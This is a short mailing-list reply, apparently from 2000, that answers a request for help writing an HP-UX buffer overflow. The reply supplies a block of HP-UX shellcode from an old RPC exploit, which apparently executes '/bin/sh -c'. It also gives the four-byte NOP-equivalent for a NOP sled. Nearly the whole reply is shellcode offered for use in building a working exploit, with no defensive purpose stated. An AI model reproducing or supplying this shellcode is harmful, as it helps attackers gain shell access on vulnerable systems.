Re: hp-ux buffer overflow

[mixter () NEWYORKOFFICE COM (Martin Ixter)]

I found this in an old rpc exploit against hpux...

This is some more or less generic HPUX shellcode:
char *code =
"\xeb\x40\x40\x02\x0b\x39\x02\x80\xd7\x40\x0c\x1e\xb7\x5a\x20\xb8\x0b\x5a\x02"
"\x59\x0f\x21\x10\x98\x97\x18\x07\xff\x0f\x39\x12\x81\x0f\x20\x12\x99\xb7\x39"
"\x20\x10\x0f\x20\x12\x1f\x0f\x59\x12\x89\xb7\x39\x20\x06\x0f\x20\x12\x1f\x0f"
"\x59\x12\x91\x0b\x38\x06\x19\x0f\x20\x12\x1f\xb7\x59\x07\xe1\x20\x20\x08\x01"
"\xe4\x20\xe0\x08\xb4\x16\x10\x16\x11\x11\x11\x11\x22\x22\x22\x22\x33\x33\x33"
"\x33\x44\x44\x44\x44\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x63\x2e";

The equivalent to a NOP on HPUX is 4 bytes: "\x0b\x39\x02\x80"

On Tue, 18 Apr 2000, Ory Segal wrote:

> Hello all ,
>
> I am working on a buffer overflow for HPUX , and I can't seem to find a shellcode for it,
>
> andybody care to join me on this new B.O. ??

________________________
mixter () newyorkoffice com
http://1337.tsx.org